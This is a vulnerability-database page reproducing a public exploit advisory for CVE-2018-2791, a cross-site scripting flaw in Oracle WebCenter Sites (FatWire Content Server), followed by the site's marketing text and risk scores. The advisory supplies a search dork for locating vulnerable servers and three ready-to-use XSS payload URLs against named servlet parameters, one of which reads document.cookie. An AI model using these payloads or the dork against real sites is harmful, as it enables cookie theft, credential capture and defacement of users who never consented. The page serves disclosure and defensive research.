Vulners
Lucene search
Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting Vulnerability | 25 May 201800:00 | – | zdt |
 | CVE-2018-2791 | 25 May 201800:00 | – | circl |
 | Oracle Fusion Middleware WebCenter Sites Component Unauthorized Operation Vulnerability | 9 May 201800:00 | – | cnvd |
 | CVE-2018-2791 | 19 Apr 201802:00 | – | cve |
 | CVE-2018-2791 | 19 Apr 201802:00 | – | cvelist |
 | Oracle WebCenter Sites 11.1.1.8.012.2.1.x - Cross-Site Scripting | 25 May 201800:00 | – | exploitpack |
 | Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting | 1 Jun 202605:38 | – | nuclei |
 | CVE-2018-2791 | 19 Apr 201802:29 | – | nvd |
 | Oracle Critical Patch Update - April 2018 | 17 Apr 201800:00 | – | oracle |
 | Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU) | 20 Apr 201800:00 | – | nessus |
10
# Exploit Title: Multiple XSS Oracle WebCenter Sites (FatWire Content
Server) 7.x < 11gR1
# Dork: inurl:Satellite?c
# Date: 18.12.201
# Exploit Author: Richard Alviarez
# Vendor Homepage: http://oracle.com
# Version: 7.x < 11gR1
# CVE: CVE-2018-2791
# Category: Webapps
# Tested on: Kali linux
====================================================
# VULNERABILITY DESCRIPTION
The backend of the Content Server is prone to permanent and reflected
Cross-Site Scripting attacks. The vulnerability can be used to include
HTML- or JavaScript code to the affected web page. The code is executed
in the browser of users if they visit the manipulated site.
The vulnerability can be used to change the contents of the displayed
site,
redirect to other sites or steal user credentials. Additionally, Portal
users are potential victims of browser exploits and JavaScript Trojans.
====================================================
# PoC : XSS :
PAYLOAD:
servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(123)%3C/script%3E%3C
Note: {ID} Change for ID to site example (1362484193835)
Other vulnerable parameters:
PAYLOAD:
servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee"<scriptalert(document.cookie)</script
PAYLOAD:
servlet/Satellite?destpage="<h1xxx<scriptalert(1)</script&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
====================================================
#Collaborators
- CuriositySec
- Vis0r
- Oxd0m7
- Vict0rData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2018 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 25.8
CVSS 38.2
EPSS0.87017
SSVC